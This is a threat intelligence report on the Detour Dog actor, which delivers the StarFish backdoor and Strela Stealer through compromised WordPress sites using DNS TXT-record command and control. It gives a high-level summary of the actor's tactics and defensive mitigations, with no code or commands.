Full Report
A threat actor named Detour Dog has been outed as powering campaigns distributing an information stealer known as Strela Stealer. That's according to findings from Infoblox, which found the threat actor to maintain control of domains hosting the first stage of the stealer, a backdoor called StarFish. The DNS threat intelligence firm said it has been tracking Detour Dog since August 2023, when
Analysis Summary
# Threat Actor: Detour Dog
## Attribution & Identity
- **Identified as:** Detour Dog.
- **Associated Groups/Activities:** Linked to infrastructure hosting the first stage of the **Strela Stealer** payload. Known to have been tracked since August 2023, with traces dating back to February 2020. Associated with the malware **StarFish** (a reverse shell).
## Activity Summary
Detour Dog powers campaigns distributing the Strela Stealer. Their infrastructure hosts the initial stage malware, StarFish. The actor was previously involved in using DNS TXT records for traffic distribution systems (TDS) to redirect visitors to scams/malware (disclosed by Sucuri in Aug 2023). More recently, this DNS C2 system has evolved to support remote content execution, aiding the Strela Stealer deployment. Detour Dog contracts botnets (like REM Proxy and Tofsee) to deliver spam emails, which then lead to Detour Dog-controlled infrastructure hosting the malware.
## Tactics, Techniques & Procedures
- Exploiting vulnerable WordPress sites to inject malicious code.
- Using malicious SVG files to deliver the StarFish backdoor.
- Utilizing **DNS TXT records** as the primary Command and Control (C2) channel to send remote code execution commands to compromised sites.
- Implementing a stealthy infection process where compromised websites function normally 90% of the time to avoid detection.
- Redirecting site visitors to scams (Help TDS or Monetizer TDS) in a small percentage (approx 9%) of cases.
- Delivering remote file execution commands in rare instances (approx 1%).
- Leveraging botnets (REM Proxy, Tofsee) for initial spam distribution.
- **MITRE ATT&CK IDs:** Not explicitly provided, but implies use of:
- T1071.004 (Application Layer Protocol: DNS) for C2.
- T1566.001 (Phishing: Spearphishing Attachment) or T1566.002 (Phishing: Spearphishing Link) via contracted botnets.
- T1547.001 (Registry Run Keys / Startup Folder) or similar persistence mechanisms via StarFish/Strela.
## Targeting
- **Sectors:** General websites hosting infrastructure (specifically leveraging WordPress sites). The ultimate target seems to be systems compromised by Strela Stealer, implying financial goals.
- **Geography:** Not explicitly defined, but victims of the related Strela Stealer campaigns (Hive0145) have included German inboxes.
- **Victims:** Compromised WordPress sites acting as staging hosts; end-victims hosting Strela Stealer are likely organizations targeted by **Hive0145** (assessed as an Initial Access Broker (IAB)).
## Tools & Infrastructure
- **Malware families used:**
- **StarFish:** A simple reverse shell acting as the first stage backdoor.
- **Strela Stealer:** The primary information stealer payload delivered by the chain.
- **PrivateLoader:** Mentioned as a historical loader associated with Tofsee botnet propagation.
- **Infrastructure (C2, domains, IPs):**
- Domains controlled by Detour Dog hosting StarFish.
- DNS Name Servers modified to parse specially formatted DNS queries for C2.
- Affiliation with the **REM Proxy** botnet (powered by SystemBC).
## Implications
Detour Dog represents a sophisticated service provider in the initial access and malware delivery economy. Their heavy reliance on DNS tunneling for C2 and their ability to maintain a low profile on compromised infrastructure (appearing benign 90% of the time) makes detection difficult. They appear to operate as a contractor, bridging sophisticated botnets (REM Proxy, Tofsee) with high-value criminal payloads like Strela Stealer, suggesting a focus on financial gain through initial access brokering.
## Mitigations
- Harden WordPress deployments immediately, focusing on blocking execution of malicious code, particularly within standard file types like SVG.
- Deploy DNS monitoring solutions capable of detecting anomalies or unexpected C2 communications leveraging DNS TXT records or non-standard DNS query formats.
- Restrict outbound connections from web servers to prevent successful reverse shell establishment if exploitation occurs.
- Investigate indicators related to known botnets like REM Proxy/SystemBC, as their involvement points towards Detour Dog infrastructure.